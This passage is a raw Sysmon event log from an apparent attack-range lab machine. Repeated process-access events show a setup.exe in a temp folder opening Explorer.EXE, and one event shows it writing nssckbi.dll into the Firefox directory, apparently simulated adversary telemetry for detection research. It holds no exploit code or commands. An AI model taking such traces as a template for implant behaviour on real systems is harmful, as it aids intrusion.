wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\nssckbi.dll2021-01-18 13:59:52.458 10341000x800000000000000015163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.458{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 